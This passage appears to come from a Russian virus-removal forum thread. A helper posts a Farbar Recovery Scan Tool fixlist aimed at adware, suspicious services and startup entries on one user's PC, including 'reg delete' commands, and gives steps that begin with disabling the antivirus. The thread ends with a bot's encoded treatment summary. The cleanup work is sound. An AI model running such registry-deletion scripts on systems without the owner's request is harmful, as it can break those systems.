BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll => No File
BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\6IrSQWjT.dll => No File
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => No File
BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Огурцов\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2017-11-26] (Mail.Ru)
BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll No File
FF Extension: (supermegabest) - C:\Users\Огурцов\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2016-03-23] [Legacy]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg [2018-11-08] <==== ATTENTION
CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2016-12-04] <==== ATTENTION
CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02]
CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22]
CHR Profile: C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile [2017-01-27]
CHR Extension: (No Name) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\ahggfmgiidlaceichjfemgbaggnbaloe [2017-11-02]
CHR Extension: (Adblocker for Youtube™) - C:\Users\Огурцов\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\cpmgdbdchhjimcbfbbhlbchbobhjonna [2016-12-22]
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ahkmpjnmnhjkpkacdhkliipnncobgkhk] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gndelhfhcfbdhndfpcinebijfcjpmpec] - hxxp://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phokcamelcbnjikjgomjjadeihhbbidh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [aonedlchkbicmhepimiahfalheedjgbh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [clgckgfbhciacomhlchmgdnplmdiadbj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ilhapdfjlmhfdgdbefpinebijmhjijpn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [indjgiebmakhmnaplnlnanodkfiejfjd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Setmy\Application\chrome.exe <==== ATTENTION
S2 Anubophatuvot; C:\Program Files (x86)\Secockarercient\JahashargkCch.dll [X]
S2 Archer; C:\Program Files (x86)\WinArcher\Archer.dll [X] <==== ATTENTION
S2 Cercither; C:\Program Files (x86)\Natertionkacerse\PptPrv.dll [X]
S2 HPWombat Service; C:\Program Files (x86)\HPWombat\HPWombatSrv.exe [X] <==== ATTENTION
S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe -originalversion 4.4.127.0 [X]
S2 TrueKey; "C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe" [X]
S2 zutuzuni; C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\jnsc7866.tmp [X] <==== ATTENTION
S1 kdvscdat; \??\C:\WINDOWS\system32\drivers\kdvscdat.sys [X]
S1 kkpqecnb; \??\C:\WINDOWS\system32\drivers\kkpqecnb.sys [X]
S1 zmyotbtz; \??\C:\WINDOWS\system32\drivers\zmyotbtz.sys [X]
2019-01-25 16:39 - 2019-01-25 16:39 - 000000062 ____C C:\Users\Огурцов\AppData\Roaming\at.txt
2019-01-19 16:05 - 2019-01-19 16:05 - 000000000 ___DC C:\ProgramData\ByteFence
2019-01-19 15:53 - 2019-01-19 15:53 - 000001046 ____C C:\Users\Огурцов\Desktop\ByteFence Anti-Malware.lnk
2019-01-19 15:53 - 2019-01-19 15:53 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ByteFence Anti-Malware
2019-01-19 15:51 - 2019-01-19 15:51 - 000000000 ___DC C:\Users\Огурцов\AppData\Roaming\efixmypc.com
2019-01-19 15:50 - 2019-01-25 17:47 - 000000000 ___DC C:\Program Files\Advance PC-Care
Virustotal: C:\Users\Огурцов\Downloads\opengl.exe
Virustotal: C:\Users\Огурцов\Downloads\OneShot Русификатор.exe
2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2019-01-19 15:50 - 2019-01-19 15:50 - 000000860 ____C C:\Users\Public\Desktop\Advance PC-Care.lnk
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\Users\Все пользователи\efixmypc.com
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advance PC-Care
2019-01-19 15:50 - 2019-01-19 15:50 - 000000000 ___DC C:\ProgramData\efixmypc.com
2019-01-25 17:24 - 2018-12-27 17:23 - 000000000 _SHDC C:\ProgramData\mineonepapkavostonaj
2018-01-10 18:16 - 2018-01-10 18:16 - 000000288 ___HC () C:\Users\Огурцов\AppData\Roaming\3b01b117ec3368f4c02bec10fe19f5bfb929dd2b
2016-10-25 15:37 - 2016-10-25 15:37 - 007214592 ____C () C:\Users\Огурцов\AppData\Roaming\agent.dat
2016-10-25 15:37 - 2016-10-25 15:29 - 000710656 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.exe
2016-10-25 15:37 - 2016-10-25 15:37 - 001910964 ____C () C:\Users\Огурцов\AppData\Roaming\Ansoft.tst
2019-01-19 15:50 - 2019-01-19 15:50 - 000221302 ____C () C:\Users\Огурцов\AppData\Roaming\DMGR_1N1I1F1S1T1I0M1F1Q2Y1I1P1B0C1F1Q1P.txt
2018-01-10 05:59 - 2018-01-10 05:59 - 000000128 ___HC () C:\Users\Огурцов\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
2015-12-27 13:03 - 2015-12-27 13:03 - 000005120 ____C () C:\Users\Огурцов\AppData\Roaming\GiftBag.db
2016-10-23 15:52 - 2016-10-25 15:34 - 000016368 ____C () C:\Users\Огурцов\AppData\Roaming\InstallationConfiguration.xml
2016-10-23 15:52 - 2016-10-25 15:29 - 000140288 ____C () C:\Users\Огурцов\AppData\Roaming\Installer.dat
2016-10-25 15:37 - 2016-10-25 15:37 - 000018432 ____C () C:\Users\Огурцов\AppData\Roaming\Main.dat
2016-10-25 15:37 - 2016-10-25 15:37 - 000005568 ____C () C:\Users\Огурцов\AppData\Roaming\md.xml
2016-10-25 15:37 - 2016-10-25 15:37 - 000126464 ____C () C:\Users\Огурцов\AppData\Roaming\noah.dat
2016-10-25 15:38 - 2016-10-25 15:38 - 000032038 ____C () C:\Users\Огурцов\AppData\Roaming\uninstall_temp.ico
2016-10-25 15:34 - 2016-10-25 15:34 - 000190394 ____C () C:\Users\Огурцов\AppData\Roaming\Vaiadax.bin
C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe
C:\Users\Огурцов\AppData\Local\Mail.Ru
C:\program files (x86)\common files\tencent
Reg: reg delete "HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater" /f
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UBar" /f
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Youtube AdBlock}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser4_is1}" /f /reg:32
CMD: reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ZaxarGameBrowser5_is1)" /f /reg:32
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers1_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers4_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
ContextMenuHandlers5_S-1-5-21-2316502943-295965077-1323287568-1001: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => C:\Users\Огурцов\AppData\Local\Microsoft\OneDrive\17.3.5951.0827\amd64\FileSyncShell64.dll -> No File
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {1274336E-AB06-46B6-A48C-0671C5557CC6} - \Microsoft\Windows\TaskScheduler\Maintenance Configurator -> No File <==== ATTENTION
Task: {1687544D-7247-4F5A-965A-A6E920E55278} - \Microsoft\Windows\TaskScheduler\Manual Maintenance -> No File <==== ATTENTION
Task: {40525C58-79C2-47A1-9AA2-F1D7FC4F0691} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {41699307-0CBD-47C4-B41E-61216AD1EE7D} - System32\Tasks\DriverPack Cloud => C:\Program Files (x86)\DriverPack Cloud\cloud.exe
Task: {6F02587F-8A2B-4552-97F6-DEEF229E335B} - \Microsoft\Windows\TaskScheduler\Idle Maintenance -> No File <==== ATTENTION
Task: {B7992938-01F1-4F40-A0EC-0D23D2F0F152} - \Microsoft\Windows\TaskScheduler\Regular Maintenance -> No File <==== ATTENTION
Task: {CFD7C21A-808B-487B-A6EC-8A10E44E8360} - \Microsoft\Windows\SettingSync\BackupTask -> No File <==== ATTENTION
Task: {DA093982-3E58-440C-AC74-B5DD36D60170} - System32\Tasks\MailRuUpdater => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [2017-11-24] (Mail.Ru) <==== ATTENTION
Task: {E431B18E-FF30-412E-956A-F9E0DB99445C} - System32\Tasks\CrashRptz => C:\Users\Огурцов\AppData\Local\CrashRpt\CrashRptz.exe
WMI:subscription\__FilterToConsumerBinding->LogFileEventConsumer.Name=\"DeviceChangeConsumer\"",Filter="__EventFilter.Name=\"DeviceChangeFilter\"::
WMI:subscription\__EventFilter->DeviceChangeFilter::[Query => select * from __instanceOperationEvent within 10 where targetInstance isa 'win32_PnPEntity']
WMI:subscription\LogFileEventConsumer->DeviceChangeConsumer::
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
HKLM\...\StartupApproved\StartupFolder: => "Zaxar Games Browser.lnk"
HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "DiskPower"
HKLM\...\StartupApproved\Run32: => "IconRunner"
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\StartupFolder: => "ProfitTaskMonitor.lnk"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "amigo"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1D8NLRRVNF"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "1IHC5CK5HN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "3UY4CSROFQ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "hdtask"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "MailRuUpdater"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "299GTXK38W"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LTCCY5NFU4"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RI7FIMYQGU"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CIUOLCHQV6"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "52THSX3HBL"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "U3VZY4RS3N"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "7S0YZZDLPN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ADUE8JHHLJ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "V527APOCWN"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "E6H6A1LMPM"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "FPEFT4XU1J"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "95RTWV2W37"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "9IO1NQKL9A"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "5YGZRUKDMF"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "17Z9ZGZLNZ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "mailruhomesearch"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "K8J77YTFGJ"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "6GMTU8RLCT"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "RMIW4E6JXC"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "Orbitum Update"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "CurrencyConvertor"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "aebleyzkpy"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "LumProcess"
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_918ABA8B1445D313589FE9A369122F26"
FirewallRules: [{D4A13780-20C2-4677-A94E-DC0390ECA138}] => (Allow) C:\Users\Огурцов\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe No File
FirewallRules: [{BEE75AB0-0CA6-42F8-A2F2-FA7A850F3068}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\tencentdl.exe (Tencent)
FirewallRules: [{89046AB3-85C2-4A93-902E-3A04E8816CD4}] => (Allow) C:\program files (x86)\common files\tencent\qqdownload\130\bugreport_xf.exe ()
FirewallRules: [{3A71A011-3C8C-4223-83B3-F74CA82E473F}] => (Allow) C:\Program Files\UBar\ubar.exe No File
FirewallRules: [{7173787B-DE1F-489E-9E94-23F93F139957}] => (Allow) C:\Program Files (x86)\Setmy\Application\chrome.exe No File
FirewallRules: [{D8E881C5-2077-4392-94A6-D566049C04AB}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File
FirewallRules: [{AFA9F0FE-AC37-4B04-8BF4-AC43018C5F7A}] => (Allow) C:\Program Files (x86)\Opera\opera.exe No File
FirewallRules: [{84310AF7-A8CF-4D83-8AE9-1E1C1D2AA2A4}] => (Block) %ProgramFiles% (x86)\Bandicam\bdcam.exe No File
FirewallRules: [{D5F2A808-CA1B-4949-8377-CD9690005013}] => (Allow) C:\Users\Огурцов\AppData\Local\Amigo\Application\amigo.exe No File
FirewallRules: [{45D538B8-C1A2-4846-B333-E0F53B95CB78}] => (Allow) C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe No File
Reboot:[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. [U]При сохранении выберите кодировку [B]Юникод[/B]![/U]
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сделайте лог [URL="https://virusinfo.info/showthread.php?t=218752&p=1480546&viewfull=1#post1480546"]Malwarebytes AdwCleaner[/URL].
04.02.2019, 22:17
CyberHelper

=C8=F2=EE=E3 =EB=E5=F7=E5=ED=E8=FF

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
[LIST][*]=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: [B]2[/B][*]=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: [B]7[/B][*]=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=
=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB =E2 =EA=E0=F0=E0=ED=F2=E8=ED=E0=F5 =ED=
=E5 =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB[/LIST]